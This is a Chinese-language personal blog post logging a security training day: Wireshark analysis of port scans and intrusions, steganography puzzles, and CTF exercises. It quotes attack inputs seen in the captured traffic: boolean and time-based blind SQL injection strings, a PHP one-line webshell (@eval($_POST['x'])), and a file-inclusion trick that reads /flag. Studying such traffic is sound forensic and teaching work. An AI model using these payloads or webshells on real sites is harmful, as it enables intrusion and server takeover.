笔记 记录 学习 实训 安全 渗透测试 流量分析 隐写

实训记录-周二

Day-2 安全分析与电子取证实战

Posted by hangyangjun on April 22, 2025

上午-流量分析实战

1 SYN半链接攻击流量分析

打开电线鲨鱼
分析流量包(.pcap)

可见大量SYN半连接端口号都不一样
所以攻击者在扫描网站开放端口
过滤条件:
ip.src == 192.168.177.145 and tcp.flags.syn == 1 and tcp.flags.ack == 1

2 SQL注入攻击流量分析一

过滤http之后
找到攻击者使用的查询语句↓
id=1'and if(length(database())=0,1,0)--+
id=1'and if(ascii(substr(database(),7,1))>79,1,0) --+
采用布尔盲注 关键词:
you are in …

3 SQL注入攻击流量分析二

过滤:
http and (ip.src==192.168.177.1 or ip.dst== 192.168.177.145)
找到攻击者使用的查询语句↓
id=1' and if(length(database())=1,sleep(5),0) --+
id=1' and if((select%20substring(database(),1,1))="a",sleep(5),1) --+

是更高级的时间盲注

4 Web入侵溯源一

发现一堆
http.response.code == 404
明显是扫后台呢
head 请求,对网站进行目录爆破

踪流->http 流,找到↓
admin_name=admin&admin_pwd=密码&submit=%B5%C7%C2%BC&act=do_login
中的admin_pwd字段
攻击者对其进行了爆破

然后发现代码 @eval($_POST['x']);

a 首先,黑客通过目录扫描,获取了后台管理地址。
b 然后通过弱口令爆破,获取到了 admin 账户的密码,登录了后台。
c 在对后台功能进行一番探索之后,找到了 admin/tpl_manage.php 文件可以通过目录遍历查看并修改任意文件的内容。由此通过修改 index.php 的内容,插入了 php 一句话木马。
d 最后,黑客向 index 页面的一句话木马传递 phpinfo() 确认了一句话写入成功。

5 Web入侵溯源二

1、使用 Wireshark 打开 webattack2.pcap 数据包。
2、因为是对 web 攻击进行溯源分析 ,所以我们只需要关注 http 协议的数据包 。所以在显示过滤器中输入 http 过滤出 http 协议的数据包。
搜索条件:
http and ((ip.src==192.168.177.1 and ip.dst==192.168.177.145) or (ip.src==192.168.177.145 and ip.dst==192.168.177.1))
3、通过对数据包的观察,前面部分的数据包为正常访问的数据包。
4、从数据包编号为 1544 的包开始,开始出现 head 请求,以及大量的 404 响应,推测黑客正在对网站进行目录爆破
5、爆破完成后,流量中出现对 /dede/login.php 的访问记录。因为 dede 为 dedecms 的默认后台地址。此时黑客可能已经获取到了后台路径,且开始尝试登陆。
6、查看 POST 数据包的内容,发现提交内容的用户名为 admin,密码为 123456 等弱口令,猜测黑客此时在进行弱口令测试。
7、随后,出现了 index.php访问记录,观察前一个数据包的返回内容,其返回的内容为 JS 跳转,跳转到 index 页面,猜测此时黑客可能已经登录成功。
8、之后黑客访问了 dede/ad_add.php 这个页面,dedecms 在 5.7 版本,这个页面存在 getshell漏洞,黑客应该是想利用此漏洞来进行 getshell。查看黑客此次 POST 提交的内容。发现了一句话木马。可以证实黑客是进行了 getshell 的操作。
9、之后出现了大量的对 ad_js.php 页面的 POST 请求,查看请求的内容,为 php 代码。此时黑客可能已经成功 getshell,使用菜刀工具对 webshell 进行了连接。

下午-流量分析与二进制ctf取证

密码追踪

Wireshark
过滤httpftp 使用数据流分析即可
好像没啥好说的

数据包文件分析

流量分析找到密文

流量数据隐写分析

藏在图片里

数据包中的线索

按长度排序
找到上传的图片,里面藏了密码
在流量文件里分离出zip加密文件,里面藏了flag

文件分析(隐写)

比较简单了
主要就是flag藏在图片二进制文件里了
然后就是png图片改大小以及base32编码
最后就是爆破一个压缩包

晚上-写了一会buuctf的题

大部分都是简单题,基本上会基础操作都能想出来。

难点


1
2
3
4
5
6
7

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

  • 有一道题是👆
    存在文件包含漏洞
    所以在网址后传参%file=/flag
    即可得到flag

  • 还有一个就是zip伪加密,遇到好几次了
    原理就是本身文件没有加密,但是二进制标志位被标记为有加密
    可以参考:
    csdn_zip伪加密(其实讲的有点不准确)

  • 以及 RAR文件格式学习(了解)

  • 再有就是一个爱因斯坦的图片,找了半天没找到压缩包的密码藏哪了,最后一查发现密码藏在图片属性里的备注里

  • and 有一个是图片隐写,需要下一个工具 Stegsolve 进行破解
    Red plane 0、Grenn plane 0、Blue plane0通道发现图片的上方有东西 bit order 调整为LSB即可发现隐藏信息

CATALOG
    FEATURED TAGS
    笔记 学习 记录 安全 实训 渗透测试 Linux go
    FRIENDS